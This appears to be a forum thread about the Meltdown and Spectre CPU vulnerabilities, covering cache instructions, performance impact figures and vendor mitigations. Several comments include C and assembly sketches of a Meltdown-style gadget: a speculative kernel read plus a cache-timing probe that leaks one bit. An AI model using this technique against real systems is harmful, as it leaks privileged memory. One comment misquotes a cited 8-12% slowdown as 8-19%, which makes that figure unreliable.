Back then I already wondered how many valid use cases there are for these kinds of instructions, apart from synthetic benchmarks. And even if you can use them to make an algorithm faster, how often are they used incorrectly because someone just assumed they would help without benchmarking properly (or because they mess up some compiler optimization)?
So my (naive) thought back then was "why not just no-op all those cache-related instructions in the CPU itself?" Then during 2017 I saw a talk about using these very same instructions to create a side channel between two VMs in Amazon's cloud, and now this. I am aware you could still make sure the data is not cached by just thrashing the cache (which would make this attack much slower than it already is), but really, what have these flush and prefetch instructions ever done for us?
Flushing the cache is important when the data must be in the main memory, for instance when an I/O device does DMA to it and is not coherent with the caches. As for prefetch instructions, they are hard to use correctly, but in some cases can make an algorithm much faster.
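For what it's worth, both instruction families are exposed as compiler intrinsics. Here's a rough sketch of how they tend to get used (the function names, the 64-byte line size, and the prefetch distance are my own assumptions, purely for illustration):

    #include <stddef.h>
    #include <emmintrin.h>   /* _mm_clflush, _mm_mfence (SSE2) */
    #include <xmmintrin.h>   /* _mm_prefetch (SSE) */

    /* Write back / invalidate a buffer before handing it to a non-coherent
       DMA device, assuming 64-byte cache lines. */
    void flush_for_dma(void *buf, size_t len)
    {
        for (char *p = buf; p < (char *)buf + len; p += 64)
            _mm_clflush(p);
        _mm_mfence();  /* order the flushes before telling the device to start */
    }

    /* Software prefetch a fixed distance ahead of a streaming read. */
    long sum_with_prefetch(const int *a, size_t n)
    {
        long sum = 0;
        for (size_t i = 0; i < n; i++) {
            _mm_prefetch((const char *)&a[i + 64], _MM_HINT_T0);  /* hint only, never faults */
            sum += a[i];
        }
        return sum;
    }

Whether the prefetch actually helps depends entirely on the access pattern and on the hardware prefetchers, which is exactly the "hard to use correctly" part.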
I'd recommend it (any moderately recent version) for simply learning as well.
Learning the internals of everything between memory and functional CPU subunits is fun (and useful).
And the ideas don't change that quickly (e.g. the TLB and ROBs that were attacked here have been around for decades in similar form). There are only so many clever things you can do when a one-bit buffer is expensive.
I imagine there might be some stuff in research papers, but that seems like an even worse learning experience.
For example: https://www.google.com/search?q=branch+prediction+scoreboard...
All in all I think the only legit use may be in benchmarks.
Most drivers I've seen just use the kernel's DMA API (dma_alloc_coherent), which is guaranteed to provide a buffer that doesn't require any explicit cache management. If the architecture is coherent, then it leaves caching turned on for those pages. If it's non-coherent, then it turns it off.
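A minimal sketch of that pattern, assuming a hypothetical driver (mydev_* and BUF_SIZE are placeholder names; dma_alloc_coherent/dma_free_coherent are the actual kernel API):

    #include <linux/device.h>
    #include <linux/dma-mapping.h>
    #include <linux/errno.h>
    #include <linux/gfp.h>

    #define BUF_SIZE 4096

    static void *cpu_buf;          /* CPU-visible address */
    static dma_addr_t dma_handle;  /* bus address handed to the device */

    static int mydev_setup_dma(struct device *dev)
    {
        cpu_buf = dma_alloc_coherent(dev, BUF_SIZE, &dma_handle, GFP_KERNEL);
        if (!cpu_buf)
            return -ENOMEM;
        /* The CPU reads/writes cpu_buf, the device DMAs to/from dma_handle;
           no explicit cache maintenance is needed either way. */
        return 0;
    }

    static void mydev_teardown_dma(struct device *dev)
    {
        dma_free_coherent(dev, BUF_SIZE, cpu_buf, dma_handle);
    }

On a coherent platform this is just ordinary cached memory; on a non-coherent one the kernel maps it uncached behind your back, which is the "turns it off" case above.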
In certain specific conditions, they can be used to increase performance, but these days this is increasingly rare because the hardware cache management is surprisingly intelligent.
This. All the talk about a 30% (or even 300%!) impact based on a graph without any details or methodology, often itself based on a microbenchmark or a tweet that went viral, is really not helping.
I especially liked the breathlessly circulated AWS forum post from someone claiming that their business-critical workload no longer fits on a single m1.medium (1 vCPU, <4GB RAM), joined by someone else who was actually swapping and hitting the OOM killer.
There is a real impact but this is going to be the lazy IT worker's new plausible excuse of the day for months…
Neither what the workload was running on before nor accusations of laziness matter; the key takeaway from that post was that the Meltdown/Spectre mitigations caused an impact on performance.
The fact that another commenter barged into the thread with an unrelated issue simply shows that the AWS forum operates under the Law of Forums (which states that all threads are to be cross-pollinated with unrelated issues from at least one other user).
EDIT: I should say that if this fellow is the only affected user from all the computer users of the world, then the mitigations applied can be called successful. That seems unlikely :-)
In this case, the thread made it clear that the real problem was that they didn't have a good deployment story — notice how the original poster was mentioning needing to move everything to an m3.medium manually? I would be quite surprised if they haven't had other problems in the past (e.g. what happens when a system update kicks off if that server is already running at 90+% utilization? or when they get more users and/or the existing users start doing slightly more) but hadn't wanted to deal with the hassle of migrating.
Sometimes this, sometimes that, it depends really.
> All the talk about a 30% (or even 300%!) impact based on a graph without any details or methodology, often itself based on a microbenchmark or a tweet that went viral, is really not helping.
Of course it's helping; everyone learned about CPU architecture, speculative execution, and caches, and started trading AMD and INTC all of a sudden.
But to be serious, doesn't "details and methodology" apply to any benchmark we see on Twitter? Or do people automatically start buying more servers when they read such a tweet? Did anyone here do that?
The point of that number is to warn people to go and measure their own workload. Google measured, and yay! not much of an impact. That's great news. Someone who does telephony and is maybe sending lots of tiny UDP packets back and forth might be impacted. Should they start crying and running around? No. They should measure, because it might affect them.
If the usage is split 50/50 kernel/userspace, and the userspace changes slow the whole app down 10%, then those changes slowed the userspace code itself down by 20% (e.g. a 100 ms request split 50 ms kernel / 50 ms user becomes 110 ms because the user half went from 50 ms to 60 ms). Likewise, if the kernel changes slow the app down 10%, they slowed the kernel code down by 20%.
So the total impact of the changes is 20% in your example.
The high performance of the physical CPU was achieved through means that compromise security. The top of the speed range was bullshit, basically. Now that the top is being lopped off, you experience the true speed of that CPU while operating in a secure manner.
So the secure execution is slower than the insecure execution was, right? Ergo, it is 'slower'.
Can you share more?
[ADDED: It's back. Was pulled back to make some changes.]
> Measureable: 8-12% - Highly cached random memory, with buffered I/O, OLTP database workloads, and benchmarks with high kernel-to-user space transitions are impacted between 8-12%. Examples include Oracle OLTP (tpm), MariaDB (sysbench), Postgres (pgbench), netperf (< 256 byte), fio (random I/O to NVMe).
> Modest: 3-7% - Database analytics, Decision Support System (DSS), and Java VMs are impacted less than the “Measureable” category. These applications may have significant sequential disk or network traffic, but kernel/device drivers are able to aggregate requests to a moderate level of kernel-to-user transitions. Examples include SPECjbb2005 w/ucode and SQLserver, and MongoDB.
It talks about a significant slowdown: 8%-19% for OLTP workloads (tpc), sysbench, pgbench, netperf (< 256 byte), and fio (random I/O to NVMe), and 3%-7% for database analytics, Decision Support Systems (DSS), and Java VMs.
As mentioned in the article, there are 3 different (identified) vulns, each with its own set of patches, and sometimes multiple different ways to patch. Each of those patches will have its own impact, and work is currently in progress to find new ways to patch that have a lower impact on performance.
Also, this means we will need to get used to patching, as new vulns of this category will definitely be found, and new changes to kernels/CPUs/compilers will be designed and will need to be applied.
> Intel has developed and is rapidly issuing updates for all types of Intel-based computer systems — including personal computers and servers — that render those systems immune from both exploits (referred to as “Spectre” and “Meltdown”)
That states that Meltdown is specifically addressed and mitigated. However, this post by Google does not indicate that "Variant 3", or "Meltdown", can be addressed by a microcode update:
> Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.
The option of applying a microcode update is explicitly called out for their mitigation of "Variant 2":
> Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), ...
Am I misreading one of these statements?
Does it mean Google applied point-and-shoot type of fixes in several areas, e.g. OS kernel and hypervisor?
Or did the speculative execution not provide meaningful performance benefits in the first place? At least for Google workloads?
If so - why all this extra complexity?
> You can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.
Confirms the `chrome://flags/#enable-site-per-process` flag is useful here & sure enough, the 2018-01-05 security patch level (SPL) was waiting for me on my Pixel when I looked.
Furthermore, the paper mentions it was unable to reproduce the attack on AMD and ARM, but it has some suggestions of things to try to make the exploit work. Other sources, including AMD itself, claim AMD is not vulnerable to Meltdown. Does anyone know the technical reasons why, and what is different compared to Intel CPUs?
Normally, that code will just error out right away.
But if you add a new branch before the code (such that the branch is taken to avoid the code, but the CPU predicts the branch to NOT be taken), the CPU will speculatively execute the above code just past your branch. The speculative execution doesn't check for memory violations (because that takes time).
Normally, that's cool: if the new branch IS taken, there is no harm because the result of the (bad) kernel access will be thrown away. If the new branch IS NOT taken, the CPU notices the bad access and complains.
But if you are extra devious, you can ensure that page X is NOT cached when running this code. Afterwards, you check whether page X suddenly got cached. That tells you the value of the high bit of your kernel memory. Keep scanning all the bits and you can read out all of kernel memory.
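A minimal C sketch of the gadget shape being described (the probe array, names, and sizes are all made up for illustration; a real exploit also has to train the branch predictor and handle the eventual fault):

    #include <stdint.h>
    #include <emmintrin.h>   /* _mm_clflush */

    static uint8_t probe[2 * 4096];   /* "page X": one slot per possible bit value */

    void gadget(const uint8_t *kernel_ptr, int allowed)
    {
        /* Make sure neither probe slot is cached beforehand. */
        _mm_clflush(&probe[0 * 4096]);
        _mm_clflush(&probe[1 * 4096]);

        /* The added branch: architecturally the body is skipped when
           allowed == 0, but a mispredicting CPU may run it speculatively
           before the permission check catches up. */
        if (allowed) {
            uint8_t bit = *kernel_ptr & 1;               /* the access that should fault */
            (void)*(volatile uint8_t *)&probe[bit * 4096]; /* cache footprint keyed on that bit */
        }
    }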
In short, the speculatively executed branch retrieves a value from a kernel page (that the code shouldn't have access to) - Intel CPUs allow this, but AMD CPUs do not. It then &s the value with 0x01, and then uses the result to calculate and access an address in a page that it DOES have access to.
This results in the cache line for that address being pulled into the CPU's data cache (and its translation into the TLB).
The result of the computation is then discarded, but the accessed line is still cached. Since there are two possible addresses that could have been cached depending on the value of the bit in the kernel page, all the code has to do is time the access to each address, and it can discern the value of that bit from the relative timings.
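The timing side can be sketched roughly like this (the two probe addresses and the "faster one wins" comparison are assumptions for illustration; real code calibrates a cycle threshold per machine):

    #include <stdint.h>
    #include <x86intrin.h>   /* __rdtscp */

    /* Time a single load; a cache hit is typically tens of cycles,
       a miss to DRAM a few hundred. */
    static uint64_t access_time(const volatile uint8_t *p)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*p;                     /* the load being timed */
        uint64_t end = __rdtscp(&aux);
        return end - start;
    }

    /* Recover one bit: whichever probe slot comes back faster was the one
       touched during the speculative window. */
    int recover_bit(const uint8_t *slot0, const uint8_t *slot1)
    {
        return access_time(slot1) < access_time(slot0);
    }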
Do we know this for sure? I see that the Meltdown paper suggests in section 7.1 that the CPU should perform the permission check against the page table before data is fetched into the cache,
but dismisses that suggestion on the grounds that it would have a very high performance impact.
Are you saying AMD does the check first anyway, and either takes the performance hit or has found a way not to take one?
"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."
Let's say you want to know whether your boss is away on vacation next week, so you call their admin and say "you need to double-check my contact info if the boss is going to be out next week." They load up the boss's calendar to check and, based on his presence next week, then load up your info. Only once that's done do they take the time to remember that the boss didn't want you to know whether they are in or out. So you hear back, "sorry, can't tell you that," but you follow up with "OK, well, can you still double-check that my phone number is..."
If they respond quickly with a yes, then your file is still on their screen and the boss is in fact out next week. If there is a short pause while they look it up, then the opposite.
How is that possible? I can understand an attacker reading its own memory, but reading foreign memory via a commonly mapped gadget section... that is just incredible!
I don't know if Minix or Hurd maps all of RAM into the kernel address space though (or if they map the kernel address space into each user-space process, as the exploit also requires).
I've been reading up a bit on these attacks and I was wondering if there are any particular requirements to implement them in an arbitrary language?
For example, can you implement the attack with Java but without JNI? i.e. are syscalls required to be able to leverage the exploit?
I have absolutely no idea if using the JVM would, for example, mess with the required timing precision, since I'm guessing one would need to use JNI/JNA to get the timing, and that might not be suitable.
Massive performance hit, but only on misbehaved software. Well-behaved software would not have the performance hit of KPTI.
The kernel could even switch to KPTI dynamically if it sees too many faulting read/write attempts from user space.
mov rax, [Somekerneladdress]
would trigger an interrupt even on speculative execution as described on https://cyber.wtf/2017/07/28/negative-result-reading-kernel-...
ADDED: So in the interrupt handler the kernel could evict all user-space pages from the cache before returning control to user space, so that user space could not use a cache timing attack to detect the speculative execution of mov rbx, [rax+Someusermodeaddress].
cmp qword [some_readable_but_uncached_addr_containing_zero], 0
//now the exploit
mov rax, [somekerneladdr]
...the rest of it...
Would it be vulnerable in the same way?
The Mill has portals (possibly) gating everything and making microkernel design easy and fast, so Meltdown would not work. Spectre, I'm not so sure; there are claims the NaR (Not a Result) mechanism might prevent it.
I bet this will come up in the next talk, looking forward to it.
I'm sure not going to be buying any new CPUs till some new architectures come out which remove this (or make the mitigations performant).
The site breaks if you block their JS.